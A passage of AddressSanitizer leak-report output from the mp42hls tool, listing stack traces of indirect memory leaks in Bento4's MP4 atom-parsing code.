long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #11 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #12 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #13 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #14 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #15 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #16 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #17 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #18 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 312 byte(s) in 8 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x53c1a4 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/test_mp42hls/mp42hls+0x53c1a4) #3 0x4222e1 in main (/test_mp42hls/mp42hls+0x4222e1) #4 0x7f476e4f2c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 256 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4bf01d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bf01d) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4c78bc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c78bc) #5 0x53a38e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/test_mp42hls/mp42hls+0x53a38e) #6 0x53c1a4 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/test_mp42hls/mp42hls+0x53c1a4) #7 0x4222e1 in main (/test_mp42hls/mp42hls+0x4222e1) #8 0x7f476e4f2c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 240 byte(s) in 3 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 192 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #3 0x6c5538 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c5538) #4 0x6c48d2 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c48d2) #5 0x4ba8b3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba8b3) #6 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #7 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #8 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #9 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #10 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #11 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #12 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #13 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #14 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #15 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #16 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #17 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #18 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #19 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #20 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 192 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #3 0x4c78bc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c78bc) #4 0x53a38e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/test_mp42hls/mp42hls+0x53a38e) #5 0x53c1a4 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/test_mp42hls/mp42hls+0x53c1a4) #6 0x4222e1 in main (/test_mp42hls/mp42hls+0x4222e1) #7 0x7f476e4f2c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 176 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c78bc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c78bc) #3 0x53a38e in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/test_mp42hls/mp42hls+0x53a38e) #4 0x53c1a4 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/test_mp42hls/mp42hls+0x53c1a4) #5 0x4222e1 in main (/test_mp42hls/mp42hls+0x4222e1) #6 0x7f476e4f2c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 160 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 152 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4b8f63 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4b8f63) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 144 byte(s) in 6 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #3 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #7 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #8 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #9 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #10 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #11 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #12 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #13 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #14 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 144 byte(s) in 6 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 136 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ba099 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba099) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 120 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x7f476e4f2c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) Indirect leak of 120 byte(s) in 5 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #3 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #4 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #5 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #6 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 104 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4ba8b3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba8b3) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #10 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #11 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #12 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #13 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #14 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #15 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #16 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #17 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 104 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x868704 in AP4_EsDescriptor::AP4_EsDescriptor(AP4_ByteStream&, unsigned int, unsigned int) (/test_mp42hls/mp42hls+0x868704) #3 0x85d250 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) (/test_mp42hls/mp42hls+0x85d250) #4 0x537d62 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) (/test_mp42hls/mp42hls+0x537d62) #5 0x4bb623 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4bb623) #6 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #7 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #8 0x672a2e in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x672a2e) #9 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #10 0x6c5538 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c5538) #11 0x6c48d2 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x6c48d2) #12 0x4ba8b3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4ba8b3) #13 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #14 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #15 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #16 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #17 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #18 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #19 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #20 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #21 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #22 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #23 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #24 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #25 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #26 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #27 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 101 byte(s) in 2 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4b9f41 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4b9f41) #3 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #4 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #5 0x4fc2da in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fc2da) #6 0x4c4421 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c4421) #7 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #8 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #9 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 96 byte(s) in 1 object(s) allocated from: #0 0x9def30 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x7f476f32e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297) #2 0x4c9f46 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/test_mp42hls/mp42hls+0x4c9f46) #3 0x4fcb35 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/test_mp42hls/mp42hls+0x4fcb35) #4 0x4fedeb in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/test_mp42hls/mp42hls+0x4fedeb) Indirect leak of 89 byte(s) in 2 